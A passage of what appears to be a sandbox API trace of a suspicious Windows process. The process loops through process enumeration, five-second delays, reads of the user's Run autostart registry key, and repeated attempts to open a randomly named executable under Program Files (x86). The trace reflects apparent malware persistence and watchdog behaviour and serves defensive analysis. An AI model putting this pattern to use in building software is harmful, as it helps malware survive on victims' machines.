DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.893] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.897] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.910] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.910] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.910] NtClose (Handle=0x14c) returned 0x0 [0176.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.910] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0176.910] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.910] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0176.910] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.914] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.920] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.920] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.920] NtClose (Handle=0x14c) returned 0x0 [0176.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.920] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0176.920] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.921] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.921] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0176.921] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.924] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.941] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.941] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.941] NtClose (Handle=0x14c) returned 0x0 [0176.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.941] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0176.941] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.941] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0176.941] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.945] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.953] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.953] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.953] NtClose (Handle=0x14c) returned 0x0 [0176.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.953] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0176.953] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.954] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.954] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0176.954] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.957] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.974] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.974] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.974] NtClose (Handle=0x14c) returned 0x0 [0176.974] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.974] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0176.975] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.975] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.975] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0176.975] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.997] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.997] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.997] NtClose (Handle=0x14c) returned 0x0 [0176.997] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.997] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x14c, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0176.997] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.039] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.047] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.047] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.047] NtClose (Handle=0x154) returned 0x0 [0177.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, 